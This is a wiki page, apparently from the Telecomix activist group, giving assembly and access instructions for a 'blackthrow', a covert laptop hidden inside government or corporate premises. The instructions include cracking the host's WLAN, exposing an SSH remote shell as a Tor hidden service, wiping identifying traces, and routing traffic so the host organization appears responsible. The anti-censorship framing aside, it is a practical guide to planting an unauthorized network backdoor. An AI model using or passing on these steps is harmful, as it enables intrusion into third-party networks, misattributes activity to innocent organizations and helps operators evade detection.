Blackthrow
From Telecomix Crypto Munitions Bureau
The blackthrow box is an effective anti-censorship peacefare equipment developed by the Telecomix Crypto Munitions Bureau (TCMB). A blackthrow is an anonymously remotely controlled drone that can be used to send any type of packets to any location at the internets. Communication with an operational blackthrow is slow, but its striking power against censorship can be equated to the power of a submerged nuclear submarine.
A blackthrow is a small computer that can be hidden inside government agencies or corporations. It connects to the TOR or I2P networks and publishes its SSH server as a hidden service in any of these networks. The TCMB field agent can then connect to the blackthrow anonymously and remote control it to deliver any type of packets to any location at the internets, that the host organization can connect to. It will look as if the host organization is responsible for the packets that are sent.
Alternative names for the blackthrow is the dropbox or the kamikaze box. The name dropbox comes from the fact that the box delivery system is akin to shopdropping. The name kamikaze box comes from the fact that once the box is installed, it will not be possible to repair it, as the risks for detection are too high. The name blackthrow is a direct translation of the swedish word svartkast. The blackthrow is just one of many types of peacefare boxes for field use developed by the TCMB.
Contents |
[edit] Blackthrow assembly instructions
The field agent should be aware of the limiting factors of the box, as it needs to be an autonomous piece of equipment. Once installed, it should never again be physically accessed. Instead of trying to repair the box if it fails, the TCMB operative is adviced to focus on creating new boxes that has as long life expectancy as possible. All blackthrow operations are classified and should be carried out in silence, unless the agent is anonymized.
0. The blackthrow itself consists of only a laptop with a WLAN card. Nothing else is needed. People throw away old laptops that are still useful, the best method to find new equipment is to search the trashes. You can also use Mini PCs (for example EPIA-based): these are cheap, small, with low-consumption and silent, making them harder to find.
1. There should be no identifying information that could lead back to the agent. TCMB therefore recommends that the hard disc should be carefully wiped. Once the machine is installed it is only a matter of time before someone finds it, even if it might takes years before this happens to a well hidden blackthrow. Once it happens though, it is possible that the sysadmins will read the hard disc to learn more about the box origns.
2. Install the operating system of choice at the laptop. Because of the low communication speeds with a hidden box, it is recommended that no graphical interface is installed. Make sure that you do not enter any identifying information what so ever in the installation process.
3. Once the operating system is installed, TOR or I2P can be installed. It is easier to use TOR. In debian linux, type "apt-get install tor". In OpenBSD type "pkg_add -vi tor".
4. For anonymous remote control of the blackthrow, the secure shell (SSH) server needs to be made accessible as a hidden service. You need to edit two lines in the /etc/tor/torrc file. The file needs to contain the following two lines.
HiddenServiceDir /etc/tor/hidden/ HiddenServicePort 22 127.0.0.1:22
You will also need to create the /etc/tor/hidden/ directory. (make sure it is owned by the account that TOR runs as. In debian, its debian-tor)
5. TCMB recommends that you very carefully clean the laptop. At this point, it should not matter if you destroy parts of the laptop in order to clean it from identifying products. The blackthrow should be able to operate fully autonomously without the need for physical access before you install it in any host organization.
6. Please also consider painting the blackthrow with the PsyOP tactical color patters for maximum perplexity.
7. Install the blackthrow at a suitable location. If necessary, you will have to crack their WLAN first. In office areas, it is often possible to hide machinery above of any of the roof tiles. Cable racks ("kabelstegar") are also possible candidates. Below the floor or inside walls are also possible hideouts. Find locations where no one would ever look casually.
[edit] Accessing the blackthrow
These instructions should not be applied to the blackthrow itself, but only at the operators computer.
To access the blackthrow, the operator needs to compile a small program and use it together with SSH. You can download it here, or directly from this wiki. Compile it with "gcc -o connect ./connect.c". Move the executable file connect to some directory that you enjoy.
Then edit /etc/ssh/ssh_config. Append the following lines to the end of the file:
# use TOR to access TOR services lol :) Host *.onion ProxyCommand /xxx/yyy/connect -S localhost:9050 %h %p
Replace xxx/yyy/ with the directory where you placed the connect program.
You should now be able to anonymously access the blackthrow by just typing (replace "fca4q5tuyhdxas7p.onion" with your own destination, which you got from the blackthrows /etc/tor/hidden/hostname file.)
ssh root@fca4q5tuyhdxas7p.onion -p 22
It will take about ten to thirty seconds to connect to the blackthrow. Once connected, an issued command will take about 2-3 seconds to return its result. The delay is caused by the extensive hopping between different computers at the TOR network. Even though the blackthrow is slow to respond, its bandwidth to the internets is as high as the host organizations. Consider piping the output to files instead of directly back to the terminal. The use of nuhup, cron and other services could help with performing tasks even if the connection is broken. Also remember that while it takes time to interact with the blackthrow, it is still possible to transfer rather large files over TOR with ease. Interactive communication is much slower than non-interactive: Use files, not the terminal, to dump the output of larger tasks.
[edit] OnionCat
It is possible to forward any type of information over OnionCat via the blackthrows, to the internets anonymously. This means that you do not have to log in to send packets, if the svartkast is configured to route packets from the OnionCat interface to its ordinary WLAN interface.
[edit] See also
- Chaosbox
- Parallel sysplex network
- Blackthrow drafts and ideas <-- drafts :-)
- SvartFON
